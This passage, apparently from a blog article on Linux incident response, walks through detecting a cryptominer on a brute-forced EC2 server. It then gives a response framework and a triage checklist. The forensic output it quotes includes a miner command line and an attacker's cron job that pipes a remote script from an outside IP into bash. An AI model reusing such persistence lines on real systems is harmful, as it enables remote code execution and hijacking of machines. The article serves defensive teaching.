  --http-tokens required \
  --http-endpoint enabled
Enter fullscreen mode Exit fullscreen mode

9. Real-World Example: Detecting a Compromised Linux Server

The Scenario

A startup's Node.js API server on AWS EC2 (Ubuntu 22.04) starts showing unusual behaviour. The on-call engineer notices the server's CPU is at 95% with no corresponding increase in API traffic. The following investigation unfolds.


T+0:00 — Initial Alert

The monitoring system (Datadog) fires a CPU alert. The engineer SSHes in:

$ top
# Output shows a process named "kworkerds" consuming 92% CPU
# This is NOT a real kernel worker — it's disguised malware
Enter fullscreen mode Exit fullscreen mode

T+0:05 — Process Investigation

$ ps aux | grep kworkerds
nobody  14782  92.1  0.2  /tmp/.cache/kworkerds -o pool.monero.hashvault.pro:443 -u <wallet>

# Immediately suspicious: running from /tmp, connecting to a Monero mining pool
$ ls -la /tmp/.cache/
total 2896
drwxr-xr-x 2 nobody nogroup  4096 Jan 15 03:12 .
-rwxr-xr-x 1 nobody nogroup 2.9M Jan 15 03:11 kworkerds
Enter fullscreen mode Exit fullscreen mode

T+0:08 — Network Investigation

$ ss -tnp | grep 14782
ESTAB  0  0  10.0.1.45:52441  195.201.x.x:443  users:(("kworkerds",pid=14782))
# Outbound connection to a known mining pool IP
Enter fullscreen mode Exit fullscreen mode

T+0:10 — Finding the Entry Point

$ grep "Jan 15 03:" /var/log/auth.log
Jan 15 03:08:22 sshd: Failed password for root from 91.108.x.x port 44213
# ... 847 more failed lines ...
Jan 15 03:11:47 sshd: Accepted password for nobody from 91.108.x.x port 52109
Enter fullscreen mode Exit fullscreen mode

Root cause identified: the nobody user had a weak password and SSH password authentication was enabled. The attacker brute-forced it in under 4 minutes.

T+0:15 — Finding Persistence

$ crontab -l -u nobody
* * * * * curl -s http://91.108.x.x/update.sh | bash

$ cat ~/.ssh/authorized_keys  # Check under nobody's home
ssh-rsa AAAAB3NzaC1... attacker@kali
# Attacker's SSH key planted for persistent re-entry
Enter fullscreen mode Exit fullscreen mode

T+0:20 — Response

  1. AWS security group updated to deny all inbound/outbound except the engineer's IP
  2. EBS snapshot taken
  3. Malicious process killed: kill -9 14782
  4. Attacker SSH key removed from authorized_keys
  5. Malicious cron job removed
  6. Binary deleted: rm -rf /tmp/.cache/
  7. nobody user password reset, SSH password auth disabled
  8. fail2ban installed and configured
  9. Postmortem scheduled

Lessons Applied:

  • SSH password authentication was disabled on all servers
  • fail2ban was rolled out across the entire fleet
  • The nobody user was locked from SSH: usermod -s /sbin/nologin nobody
  • A baseline of authorised processes was added to the SIEM for anomaly detection
  • AWS GuardDuty was enabled on the account — it would have flagged the cryptomining connection within minutes

10. Conclusion — The DICRP Framework

Every server incident, regardless of severity, fits into a five-phase lifecycle. Having a mental model for this prevents you from jumping straight to remediation before you have fully understood the scope.

┌───────────────────────────────────────────────────────────────────────────┐
│                         THE DICRP FRAMEWORK                               │
│                                                                           │
│  ┌─────────┐   ┌───────────┐   ┌─────────┐   ┌─────────┐   ┌─────────┐  │
│  │  DETECT │──►│INVESTIGATE│──►│ CONTAIN │──►│ RECOVER │──►│ PREVENT │  │
│  └─────────┘   └───────────┘   └─────────┘   └─────────┘   └─────────┘  │
│                                                                           │
│  Detect        Investigate     Contain         Recover        Prevent     │
│  ─────────     ───────────     ───────         ───────        ───────     │
│  Monitoring    Preserve        Isolate         Restore        Harden      │
│  Alerts        evidence        server          from backup    SSH         │
│  Log review    ID access       Kill sessions   Patch vuln     Enable MFA  │
│  Anomalies     vector          Rotate creds    Verify         FIM         │
│                Timeline        Scope blast     integrity      IDS/SIEM    │
│                Persistence     radius          Resume ops     Least priv  │
└───────────────────────────────────────────────────────────────────────────┘
Enter fullscreen mode Exit fullscreen mode

A server compromise is not just a technical event — it is a business event with legal, reputational, and financial consequences. The teams that handle it best are not the ones who never get attacked; they are the ones who have already thought through their response before the incident happens.

Build your detection. Practice your playbook. Know your logs. The attacker only needs to get lucky once — you need to be ready every time.


Quick Reference Card

FIRST 10 MINUTES CHECKLIST
────────────────────────────────────────────────────────────────────
☐ Take a cloud disk snapshot BEFORE doing anything else
☐ Run: ps aux --sort=-%cpu | head -20
☐ Run: ss -tulpn
☐ Run: last -n 50 -a
☐ Run: grep "Accepted" /var/log/auth.log | tail -30
☐ Run: find / -mtime -1 -type f -not -path "/proc/*" 2>/dev/null | head -20
☐ Check: crontab -l && ls /etc/cron.d/
☐ Check: cat ~/.ssh/authorized_keys (for all users)
☐ Isolate server (update security group / iptables)
☐ Notify your incident response team
────────────────────────────────────────────────────────────────────
Enter fullscreen mode Exit fullscreen mode

This article reflects current best practices as of mid-2024. The threat landscape evolves continuously — always verify CVEs, tooling, and log paths against your specific OS version and cloud provider documentation.

Top comments (0)